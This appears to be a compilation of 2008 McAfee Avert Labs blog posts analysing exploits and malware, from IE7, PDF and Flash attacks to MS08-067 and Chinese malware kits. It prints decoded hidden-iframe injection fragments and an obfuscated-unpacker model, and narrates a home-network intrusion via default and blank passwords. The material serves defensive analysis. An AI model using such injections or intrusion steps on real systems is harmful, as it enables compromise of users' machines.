The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace.

Downloader Trojan Exploits Hole in IE 7

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x that references already freed memory in the mshtml.dll.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

McAfee Releases Virtual Criminology Report, Edition 4

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific bank going under hits, scams and malware using that messaging emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election: malware using President-Elect Barack Obama’s messaging emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Further MS08-067 Woes

[Image: MS08-067 worm]

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this and future variants of W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays! ;)

Secure Computing Links With McAfee Avert Labs

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert Labs

Exploit-MS08-067 Bundled in Commercial Malware Kit

Probably the most widely reported topic in the Chinese security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted to a well-known public repository site. Within a few days, the malware kit author WolfTeeth was quick to sell an MS08-067 port-scanning tool with attack capability to his “customers”, built from free code taken from the Internet.

[Image: WolfTeeth]

Taking a peek into his “malware shop”, one finds a series of malware kits for sale - including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offer a free version and a commercial version with enhanced features including:

  • Kernel rootkit.
  • Anti-virus software termination.
  • Weekly anti-virus detection monitoring and evasion service.
  • Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page he has publicly priced an AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features: terminating popular anti-virus software in China, downloading updates, and stealth capability.

[Image: AdClicker for Sale Site]

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

2008 Presidential Malware review

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both campaigns were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the malware authors specifically targeted him instead of John McCain as a means of luring users into clicking on the malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe. The email carried the subject “Obama bribes countrymen to win votes”; if the user followed the link it would download Get_Flash_updates.exe, which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World].

Finally, today we also received a new one named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrow’s DAT release.

We expect to see several more malicious files using the US Presidential election as a means of social engineering in order to trick users into executing them. So please be on the lookout and keep your security software up to date.

First Glimpse into MS08-067 Exploits In The Wild

It has been over 2 years since I last wrote about malware exploiting a major vulnerability in the Windows Server Service (MS06-040).

In 2006, worm authors were quick to adopt the remotely executed exploit just 4 days after a security update was released as part of the regular Patch Tuesday - IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, etc.

Now in 2008, we are faced with malware authors who are motivated by profit, more organized, and more likely to target zero-day vulnerabilities, as we have reported on several critical incidents discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new vulnerability, MS08-067, targeting the same Windows Server Service.

Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it is using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that will look very familiar to anyone who studied MS06-040.

[Image: MS08-067 strings]

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

[Image: MS08-067 exploit]

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

[Image: MS08-067 shellcode (shellcode after decoding)]

Just hours after the patch release, public source code has already been seen circulating on the Internet. What more can I say? Patch your systems! Yes, NOW!

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(thanks to Joey Koo and Xiaobo Chen for providing analysis data and packet dumps used in this blog)

McAfee Coverage of the Microsoft Emergency Release

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware - Emergency DAT cut and testing in progress. ETA of 2 - 3 hours.

HIPS - Generic buffer overflow should provide coverage.

Intrushield - Partial existing coverage. Additional emergency sigset releasing today.

Foundstone - Emergency signatures being released today.

V-Flash - Emergency signatures being released today.

MNAC - Emergency signatures being released today.

VirusScan Enterprise BOP - Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. In this issue we take aim at the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Porn for Free: Puper Promises Hot Videos on YouTube

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

Zero-Day Exploit Strikes QuickTime 7.5.5, iTunes 8.0

A zero-day exploit against the latest QuickTime (Version 7.5.5) and iTunes (8.0) was released yesterday. The exploit author announced this as a remote heap overflow so we decided to take a look and analyze it.

After our research, we found that this is actually an off-by-one stack overflow. Some noteworthy points:

1. QuickTime has the /GS switch option enabled, hence a cookie is put into the stack.

2. Since this is an off-by-one stack overflow, the attacker can overwrite only one byte of the cookie. The Check_stack_cookie function is called when the function returns; if it finds that the cookie does not match, the program exits. This results in the crash of QuickTime and iTunes.

The crash means it is unlikely that code execution would be feasible via this attack vector. However, users of these apps should take the attack seriously and look at appropriate defenses.

Secure Your Wireless Router Part 2

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure Your Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure them.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so - identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router - “admin”. I tried that and sure enough, got into the admin page.

Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me - “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are just a couple of tips to get you started with security and get you in far better shape than my friend:

  1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
  2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
  3. Disable NULL sessions. Look up how to do it online.

Localized 0-day Once Again: Exploit-TaroDrop.e

One of the issues that we’ve been highlighting in our recent conference presentations and blogs is the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor Ichitaro last Friday.

This Japanese application has been known to be under targeted attack for several years, and a few 0-day vulnerabilities were discovered and exploited in the past. Besides Ichitaro, other popular localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities even months after they have been patched by the vendor.

Users should continue to stay vigilant about suspicious email attachments and not open unknown files. Please be sure to update your applications, whether popular or not, with the latest security patches to protect you and your organization from known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledged the vulnerability and will be posting a patch.

J2ME Security Vulnerabilities Discovered

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

  • gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
  • running a malicious MIDlet when the phone is first turned on
  • accessing files
  • sending SMS/MMS
  • making phone calls
  • reading your contacts
  • accessing the SIM card
  • eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber, which caused only premium-rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof of concept (PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

New PDF exploits: “Old wine in a new bottle!”

We came across some samples, and some vendors claimed that these samples were exploiting the new PDF vulnerability CVE-2008-2641.

We took a look at this issue and found that this is not the case; they are still exploiting the old vulnerability CVE-2007-5659, a buffer overflow in the JavaScript function Collab.collectEmailInfo in Adobe Reader’s own JavaScript engine.

The JavaScript itself was compressed in the PDF file. After decompressing the content, it turned out to be obfuscated JavaScript code. After digging through the obfuscated code, the real exploit was found encrypted in a long string. There is a function which decrypts the string into the real exploit code and then passes it to the eval() function.

It’s interesting that the function uses the function code itself (arguments.callee) as part of the key to decrypt the real exploit code, so it won’t work if you simply replace eval() with “alert” or “document.write” to get the real exploit, as eval() itself is also part of the key. It’s an interesting way to obfuscate the exploit code to prevent security researchers from reaching the real exploit, almost like a ‘self-checksum’ mechanism.
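As an added example (not code from the original post or from the sample it analyses), the following models this self-keyed unpacker with a benign stand-in payload and a constructed toy cipher, and shows why hooking the global eval binding, rather than editing the source, recovers the stage-2 script. It uses a named self-reference in place of arguments.callee so that it also runs in strict mode.

```javascript
// Added example (not code from the original post or the sample it analyses): a benign
// model of the self-keyed unpacker described above, plus the analyst's way around it.

// FNV-1a 32-bit hash of a string: any change to the input changes the digest.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Toy stream cipher (constructed; the real sample's cipher is not shown on the page):
// an xorshift32 keystream seeded from the hash of `keySource`, XORed into each code
// unit. XOR is its own inverse, so one function both packs and unpacks.
function xorStream(text, keySource) {
  let s = fnv1a(keySource) || 1; // xorshift must not start from 0
  let out = "";
  for (let i = 0; i < text.length; i++) {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5;  s >>>= 0;
    out += String.fromCharCode(text.charCodeAt(i) ^ (s & 0xff));
  }
  return out;
}

// The unpacker as it would ship: the key is its OWN source text, the role
// arguments.callee played in the sample (a named self-reference is used here so the
// code also runs in strict mode). The literal token "eval" is part of that text, so
// editing it to "alert" or "document.write" silently changes the key.
function unpack(enc) {
  const key = unpack.toString();
  const stage2 = xorStream(enc, key);
  return eval(stage2);
}

// Packer step (constructed): a benign stand-in for the stage-2 script, encrypted under
// the unpacker's source text.
const PAYLOAD = "'stage2:' + (6 * 7)";
const ENC = xorStream(PAYLOAD, unpack.toString());

// What the hand-edited approach yields: decrypting with the modified source gives garbage.
function decryptWithEditedSource(enc) {
  const edited = unpack.toString().replace("eval(", "alert(");
  return xorStream(enc, edited);
}

// Analyst approach: leave the source untouched (so the key is unchanged) and hook the
// global eval binding instead, capturing the decrypted script without executing it.
function captureStage2(enc) {
  const realEval = globalThis.eval;
  let captured = null;
  globalThis.eval = (code) => { captured = code; };
  try {
    unpack(enc);
  } finally {
    globalThis.eval = realEval; // always restore the real eval
  }
  return captured;
}

// Stand-alone run.
console.log("direct run      :", unpack(ENC));                              // stage2:42
console.log("hand-edited key :", JSON.stringify(decryptWithEditedSource(ENC)));
console.log("hooked eval     :", captureStage2(ENC));                       // 'stage2:' + (6 * 7)
```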

After we figured out the way to get the real JavaScript exploit code, we found that it exploits CVE-2007-5659 reliably with a heap-spray technique.

Some vendors claim that the exploit works on lower versions but crashes 8.1.2. This is not the case: the heap spray takes some time to fill memory, and during that period we observed that Adobe Reader stopped responding, but it did not crash. After a couple of minutes it is back to normal and pops up a dialog box, “Send by Email for review”. So, in short, Adobe Reader 8.1.2 seems to be immune to this exploit as Adobe has already patched this vulnerability.

Two new Linux kernel vulnerabilities discovered & patched

Avert Labs recently discovered and reported two Linux kernel vulnerabilities, both of which have been patched by the Linux kernel maintainers.

The first one is a BER decoding remote vulnerability (CVE-2008-1673). This vulnerability was patched by the Linux dev team on 9th June 2008.

This vulnerability is a kernel heap overflow in the CIFS and ip_nat_snmp_basic modules. It’s possible to reach the exploitable condition on 64-bit platforms. Though it’s hard to trigger a kernel heap overflow on 32-bit platforms, it’s still possible to crash the Linux box. We strongly recommend users update to the following kernel versions:

Linux kernel 2.6.25.5
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.4.36.6

Some vendors have mistakenly marked this as a vulnerability exploitable only in the local network. A correction for them: this vulnerability is remotely exploitable. We contacted one such security service provider who had marked this issue as exploitable over the ‘local network’ only and got this response:

“According to our information the ASN.1 decoding vulnerability exists within the modules handling CIFS and SNMP traffic. These are both protocols which we think should be firewalled off the Internet via common “best practices”, thus we set the attack vector to “local network” only.”

I don’t really agree with this approach, anything that is firewallable is locally exploitable then? In fact I would rather say that it is remote vulnerabilities like these that need firewall policies to be enabled and not the other way round. I would love to hear opinions from others on this issue.

BTW our McAfee Network Security Platform (formerly IntruShield) has already been updated with content to protect against this vulnerability.

The other issue was found by Brandon Edwards which is another interesting issue in DCCP, it is a local privilege escalation vulnerability (CVE-2008-2358). The vulnerability (supposedly) only exists in 2.6.17, 2.6.18, and 2.6.19 due to boundary checks in the upstream kernel versions. It is non-trivial to exploit this vulnerability.

Nuwar circulating a fake topic - Beijing earthquake

Nuwar families are known for using social engineering to trick users into downloading them. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - a Beijing earthquake (not the Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it: this page has an iframe link to a malicious JavaScript.

Upon accessing the above page, the obfuscated JavaScript is downloaded and run because of the injected iframe. The JavaScript exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another variant of Nuwar. McAfee VSE blocks the script and detects it as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

Flash Player Exploit Update 2

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability: CVE-2007-0071. At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

The exploits that we have captured from the field do not appear to exploit the latest version of Flash. We continue to hunt for missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it’s best to update to the latest player, if you haven’t yet done so.

Flash Player Exploit Update

Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability. While looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks. Hacked sites reference an external script, just as they have for quite some time. But the external scripts now reference an SWF file. This SWF file references another SWF file named WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be off-line. While we cannot confirm that this last SWF file attempts to exploit this new vulnerability, Symantec mentioned the same domain serving the exploit earlier. SANS also mentions another domain, and 2 presumed exploits named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf) and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf), also off-line. These file names suggest 3 things:

1) Different exploits are crafted to exploit different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0.
2) Versions of the exploit may also exist, or be under development, to target other operating systems, as the aforementioned file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in “i”, “ie”, or “ff”.

Thus far we’ve identified 2 particular domains involved in mass hacks that are also believed to have served these Flash exploits. Combined, Google yields approximately 250,000 page results when searching for those references (i.e. compromised sites that link to scripts that link to Flash exploits).

Again this threat is still under analysis, more details to follow.

Mass Hacks Likely to Hang Around for a While

In March I blogged about a round of mass Web site compromises. Since then several other instances have been discovered, as well as a couple of smoking guns. The net result is that the bad guys are using automated tools to find and attack Web applications that are vulnerable to SQL-injection attacks. Many of these applications are homegrown, so there is no patch or hotfix for administrators to install. This means that simply removing the injected malicious code won’t last long.

Just now I was reviewing the latest batch of hacked sites, and I noticed pages that were previously compromised and “repaired,” only to be compromised again. The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input validation must be corrected. And given that many Web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a very long time.

McAfee’s Foundstone Hacme Shipping tool can be a useful resource for those who want a better understanding of how common Web application attacks occur and how to code against them properly.

Hacme Shipping 1.0
Hacme Shipping is a Web-based shipping application developed by Foundstone to demonstrate common Web application-hacking techniques such as SQL injection, cross-site scripting, and escalation of privileges–as well as authentication and authorization flaws and how they are manifested in the code. Written in ColdFusion MX 7 using the Model-Glue framework and a MySQL database, the application emulates the online services provided by major shipping companies.

The commercial HTML packer dilemma

Following the big noise made by the latest mass injection of sites with malicious JavaScript, which infected many computers via a number of exploits, I decided to take a look at the trail that was left behind, and it has proven to be an interesting exercise!

A few days ago I noticed a large number of websites that were misbehaving, and I came across many pages that would fire up the usual ActiveX alert in my Internet Explorer 7 after loading a JavaScript file called (on this occasion) addr.js … Not surprisingly, these were mostly based in China, and here is a snippet of code that most of you would probably recognise by now.

So far nothing new: the JavaScript function you can see above, designed by Dean Edwards to obfuscate HTML code, has been discussed in many posts, and it is a popular way for web developers to “hide” sensitive source code on their pages. Unfortunately, it is also a popular method for hiding malicious code, and the example above does just that. Here are some interesting parts of the decoded version of the above example:

try{if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)

This checks whether the version of Internet Explorer is 7, and the script then loads the following IFRAMEs depending on some other factors such as GMT, ActiveX, the RealPlayer version present, etc.

<iframe style=display:none src="http:// :///ms.gif">
<iframe style=display:none src=":///xl.gif">
<iframe style=display:none src="http:// :///bd.gif">
<iframe style=d'+'isp'+'lay:none src="http:// :///r'+'eal.g'+'if">
<iframe style=d'+'isp'+'lay:none src="http:///r'+'eal_new.g'+'if">
<iframe style=display:none src="http:// :///lz.gif">

As we can see, 6 IFRAMEs are hidden in the code, and they load various pages with exactly the same exploits (with minor variations) that were used in the recent mass injection a couple of weeks ago.

So you might ask now, what’s new about that? Well, what is worrying is the fact that the pages loaded by the IFRAMEs attempt to grab some fake GIF (image) files that in fact hide more JavaScript code, but this time the code is obfuscated by yet another commercial tool called HTMLSHIP.

The following snippet is an example from one of the pages hiding a RealPlayer Exploit:

As you may have noticed, this is pretty much unreadable, but here is the important part of the code de-obfuscated using one of my favourite tools, the Caffeine Monkey implementation of the Mozilla browser engine from Ben Feinstein and Daniel Peck at SecureWorks.


Above we can see the CLSID for the RealPlayer ActiveX Control.
And below we can see some of the code used to exploit the vulnerability described here.


So far I have seen a few variations in the domains used to host the various exploits involved as well as in the names for the Javascript file and we will be monitoring these for changes to see if it will be used more extensively in the future.

As of today the samples I discovered are still not detected by any AV … Well except one that is… ;-)

An additional note: the techniques used to obfuscate malicious JavaScript on web pages are becoming more sophisticated and more difficult to signature for conventional AV engines.
Nowadays there are a large number of tools similar to the ones mentioned above, allowing malware authors to obfuscate with ease.

To draw a quick parallel with binary files and their respective packers (compressors, protectors, encryptors and so on): this is not a new technique, but as I said, things are becoming more sophisticated, just as with UPX versus the likes of Armadillo, ASProtect and others.

To hide or not To hide

In an ideal world, the people making this commercial protection software available would have no need to hide code in such convoluted ways, and perhaps, in the case of web design, people should be more aware of other practices that keep code secure and protected for copyright and/or trademark reasons, for example server-side scripting, or using Ajax and Java for servlets.

If I were to embark on the task of leeching the code of a particularly interesting web page, and I understood the inner workings of scripting languages such as JavaScript or Microsoft’s JScript implementation for IE, I would not be stopped by such trivial means of hiding the code, which can easily be reverted to its original form with a few clicks and the latest version of a browser engine like Mozilla’s JavaScript C engine.

Many ideas are being brought forward in the field of packing and how to counteract the incredible rise in malware variants caused by it. Perhaps people making legitimate software and writing legitimate HTML code for web pages should start coming to terms with the fact that “security through obscurity” has failed miserably to deliver, and that the cleaner their products are, the easier it will be for all of us to identify suspicious illegal software/code, making the task of identifying the bad guys a little less daunting….. however, this is far from an ideal world ;-)
Errr…. Linux anyone?

Honey, I missed the ‘()’!!: Zero-Day Bug fixed in PHP

Some time back we came across this interesting vulnerability, posted by a Chinese researcher on his blog, who claimed to have found a zero-day vulnerability in PHP 5.2.3.

We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerability affects not only version 5.2.3 but also version 5.2.5. It is a heap overflow that can be triggered when a web server running PHP receives a malformed URI request; it can be as simple as “GET /index.php/aa HTTP/1.1”. Successful exploitation can result in arbitrary code execution with the privileges of the web server.

This happens because the author misplaced a bracket, resulting in a miscalculation of the buffer size, which can lead to a heap overflow. Fixing this issue is therefore also simple: in sapi/cgi/cgi_main.c, grep for “ptlen + env_path_info ? strlen(env_path_info) : 0;” and replace it with “ptlen + (env_path_info ? strlen(env_path_info) : 0);”.
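The following added example (not PHP’s own code) models that length calculation both ways to show why the missing parentheses undersize the heap buffer; the script path and the PATH_INFO taken from “GET /index.php/aa” are constructed inputs.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration, not PHP's code: ptlen models the length of the
 * translated script path, env_path_info the (possibly NULL) PATH_INFO. */

/* The expression as quoted above, with the parentheses C actually applies:
 * '+' binds tighter than '?:', so the condition is (ptlen + env_path_info)
 * and ptlen never reaches the result once PATH_INFO is present. Only call
 * this with a non-NULL env_path_info; the real bug dereferences NULL otherwise. */
static size_t buggy_len(size_t ptlen, const char *env_path_info)
{
    return (ptlen + env_path_info) ? strlen(env_path_info) : 0;
}

/* The corrected expression: the parentheses make '?:' part of the addend. */
static size_t fixed_len(size_t ptlen, const char *env_path_info)
{
    return ptlen + (env_path_info ? strlen(env_path_info) : 0);
}

/* Size a buffer with len_fn (plus NUL) the way the CGI SAPI sizes its
 * malloc, then report how many bytes the real concatenation would write
 * past it. 0 means it fits; anything else is the heap overflow. */
static size_t overflow_bytes(size_t (*len_fn)(size_t, const char *),
                             const char *script_path, const char *env_path_info)
{
    size_t ptlen = strlen(script_path);
    size_t alloc = len_fn(ptlen, env_path_info) + 1;
    size_t need  = ptlen + (env_path_info ? strlen(env_path_info) : 0) + 1;
    return need > alloc ? need - alloc : 0;
}

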